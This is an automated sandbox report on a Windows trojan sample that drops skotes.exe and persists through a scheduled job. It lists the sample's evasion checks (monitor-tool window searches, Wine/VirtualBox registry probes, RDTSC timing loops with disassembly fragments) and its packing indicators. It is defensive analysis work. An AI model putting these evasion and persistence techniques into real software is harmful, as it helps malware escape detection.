Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F64B30 7_2_00F64B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F97F36 7_2_00F97F36
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe 4FEAE1EA40A074D042BA08876D3C459DDDCEFC9D4EAAD6A5A0709DD482E899DF
Uses 32bit PE files
Source: msqT9atzYW.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: msqT9atzYW.exe Static PE information: Section: ZLIB complexity 0.998414083787466
Source: msqT9atzYW.exe Static PE information: Section: xwcxlzln ZLIB complexity 0.9951746323529411
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.998414083787466
Source: skotes.exe.0.dr Static PE information: Section: xwcxlzln ZLIB complexity 0.9951746323529411
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\msqT9atzYW.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: msqT9atzYW.exe ReversingLabs: Detection: 57%
Source: msqT9atzYW.exe Virustotal: Detection: 52%
Source: msqT9atzYW.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\msqT9atzYW.exe File read: C:\Users\user\Desktop\msqT9atzYW.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\msqT9atzYW.exe "C:\Users\user\Desktop\msqT9atzYW.exe"
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: msqT9atzYW.exe Static file information: File size 1996800 > 1048576
Source: msqT9atzYW.exe Static PE information: Raw size of xwcxlzln is bigger than: 0x100000 < 0x1b5c00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\msqT9atzYW.exe Unpacked PE file: 0.2.msqT9atzYW.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 7.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1efeb5 should be: 0x1ebd33
Source: msqT9atzYW.exe Static PE information: real checksum: 0x1efeb5 should be: 0x1ebd33
PE file contains sections with non-standard names
Source: msqT9atzYW.exe Static PE information: section name:
Source: msqT9atzYW.exe Static PE information: section name: .idata
Source: msqT9atzYW.exe Static PE information: section name:
Source: msqT9atzYW.exe Static PE information: section name: xwcxlzln
Source: msqT9atzYW.exe Static PE information: section name: gxotezyq
Source: msqT9atzYW.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: xwcxlzln
Source: skotes.exe.0.dr Static PE information: section name: gxotezyq
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F7D91C push ecx; ret 7_2_00F7D92F
Source: msqT9atzYW.exe Static PE information: section name: entropy: 7.987683787433311
Source: msqT9atzYW.exe Static PE information: section name: xwcxlzln entropy: 7.954322884658926
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.987683787433311
Source: skotes.exe.0.dr Static PE information: section name: xwcxlzln entropy: 7.954322884658926
Drops PE files
Source: C:\Users\user\Desktop\msqT9atzYW.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\msqT9atzYW.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\msqT9atzYW.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\msqT9atzYW.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: C4EC1F second address: C4EC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: C4EC23 second address: C4EC31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDC629 second address: DDC633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDC633 second address: DDC65F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43C8AE008Ch 0x00000008 jmp 00007F43C8AE0080h 0x0000000d jg 00007F43C8AE0076h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F43C8AE0076h 0x0000001b jnc 00007F43C8AE0076h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDC65F second address: DDC665 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDB5F0 second address: DDB5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDB787 second address: DDB78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDB78B second address: DDB794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDB909 second address: DDB90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDB90D second address: DDB913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDB913 second address: DDB922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F43C9098CE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDBA8A second address: DDBA8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDBA8E second address: DDBA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDBBF6 second address: DDBC19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 jne 00007F43C8AE0082h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDBC19 second address: DDBC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDBD97 second address: DDBDD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0082h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F43C8AE0076h 0x00000012 jmp 00007F43C8AE0088h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDBDD1 second address: DDBDE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C9098CEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDBDE5 second address: DDBDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F43C8AE0076h 0x0000000c jnc 00007F43C8AE0076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDEE34 second address: DDEE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDEE38 second address: DDEE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F43C8AE0076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDEEDF second address: DDEF0C instructions: 0x00000000 rdtsc 0x00000002 js 00007F43C9098CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 js 00007F43C9098CE6h 0x00000017 jo 00007F43C9098CE6h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push edi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDEF0C second address: DDEF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jns 00007F43C8AE0096h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43C8AE0088h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDEF34 second address: DDEFA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a js 00007F43C9098CEEh 0x00000010 pop eax 0x00000011 jne 00007F43C9098CECh 0x00000017 push 00000003h 0x00000019 movsx edx, cx 0x0000001c push 00000000h 0x0000001e or edi, 5B02A242h 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F43C9098CE8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 and di, 944Fh 0x00000045 push 70C650F8h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F43C9098CF8h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDEFA9 second address: DDEFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF087 second address: DDF08D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF08D second address: DDF091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF1C4 second address: DDF216 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43C9098CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F43C9098CECh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F43C9098CF3h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F43C9098CF4h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F43C9098CEBh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF216 second address: DDF2AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jnl 00007F43C8AE008Dh 0x00000013 pop eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F43C8AE0078h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e call 00007F43C8AE0083h 0x00000033 pop ecx 0x00000034 push 00000003h 0x00000036 mov edi, dword ptr [ebp+122D2C19h] 0x0000003c push 00000000h 0x0000003e cld 0x0000003f or dword ptr [ebp+122D383Bh], edi 0x00000045 push 00000003h 0x00000047 jmp 00007F43C8AE007Ch 0x0000004c call 00007F43C8AE0079h 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF2AC second address: DDF2B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF2B0 second address: DDF2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F43C8AE007Ch 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 js 00007F43C8AE0096h 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F43C8AE0076h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF2D6 second address: DDF2F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe RDTSC instruction interceptor: First address: DDF2F5 second address: DDF2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
